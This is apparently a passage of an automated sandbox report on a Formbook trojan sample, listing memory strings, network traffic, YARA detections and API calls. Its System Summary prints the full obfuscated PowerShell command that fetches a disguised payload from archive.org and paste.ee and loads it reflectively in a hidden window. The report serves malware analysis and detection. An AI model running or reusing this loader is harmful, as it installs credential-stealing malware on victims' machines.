64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600102.us.archive.org
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2415529480.000001F917296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.airgame.store
              Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.airgame.store/ojib/
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000002.00000002.2415529480.000001F91724C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000002.00000002.2415529480.000001F917269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
              Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
              Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gamesfunny.top$
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA6C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA730E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.arX
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
              Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: dllhost.exe, 0000000B.00000003.2920396732.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
              Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
              Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/mFPBh/0
              Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
              Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
              Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0042C283 NtClose,5_2_0042C283
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk,5_2_032835C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282B60 NtClose,LdrInitializeThunk,5_2_03282B60
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03282DF0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03282C70
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03284340 NtSetContextThread,5_2_03284340
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03283010 NtOpenDirectoryObject,5_2_03283010
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03283090 NtSetValueKey,5_2_03283090
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03284650 NtSuspendThread,5_2_03284650
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282BA0 NtEnumerateValueKey,5_2_03282BA0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282B80 NtQueryInformationFile,5_2_03282B80
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282BE0 NtQueryValueKey,5_2_03282BE0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282BF0 NtAllocateVirtualMemory,5_2_03282BF0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282AB0 NtWaitForSingleObject,5_2_03282AB0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282AF0 NtWriteFile,5_2_03282AF0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282AD0 NtReadFile,5_2_03282AD0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032839B0 NtGetContextThread,5_2_032839B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282F30 NtCreateSection,5_2_03282F30
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282F60 NtCreateProcessEx,5_2_03282F60
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282FA0 NtQuerySection,5_2_03282FA0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282FB0 NtResumeThread,5_2_03282FB0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282F90 NtProtectVirtualMemory,5_2_03282F90
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282FE0 NtCreateFile,5_2_03282FE0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282E30 NtWriteVirtualMemory,5_2_03282E30
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282EA0 NtAdjustPrivilegesToken,5_2_03282EA0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282E80 NtReadVirtualMemory,5_2_03282E80
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282EE0 NtQueueApcThread,5_2_03282EE0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282D30 NtUnmapViewOfSection,5_2_03282D30
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282D00 NtSetInformationFile,5_2_03282D00
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03283D10 NtOpenProcessToken,5_2_03283D10
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282D10 NtMapViewOfSection,5_2_03282D10
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03283D70 NtOpenThread,5_2_03283D70
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282DB0 NtEnumerateKey,5_2_03282DB0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282DD0 NtDelayExecution,5_2_03282DD0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282C00 NtQueryInformationProcess,5_2_03282C00
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282C60 NtCreateKey,5_2_03282C60
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282CA0 NtQueryInformationToken,5_2_03282CA0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282CF0 NtOpenProcess,5_2_03282CF0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282CC0 NtQueryVirtualMemory,5_2_03282CC0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03854340 NtSetContextThread,LdrInitializeThunk,11_2_03854340
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03854650 NtSuspendThread,LdrInitializeThunk,11_2_03854650
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038535C0 NtCreateMutant,LdrInitializeThunk,11_2_038535C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852B60 NtClose,LdrInitializeThunk,11_2_03852B60
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852AD0 NtReadFile,LdrInitializeThunk,11_2_03852AD0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852AF0 NtWriteFile,LdrInitializeThunk,11_2_03852AF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038539B0 NtGetContextThread,LdrInitializeThunk,11_2_038539B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852FB0 NtResumeThread,LdrInitializeThunk,11_2_03852FB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852FE0 NtCreateFile,LdrInitializeThunk,11_2_03852FE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852F30 NtCreateSection,LdrInitializeThunk,11_2_03852F30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03852EE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852DD0 NtDelayExecution,LdrInitializeThunk,11_2_03852DD0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03852DF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03852D10
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03852D30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03852CA0
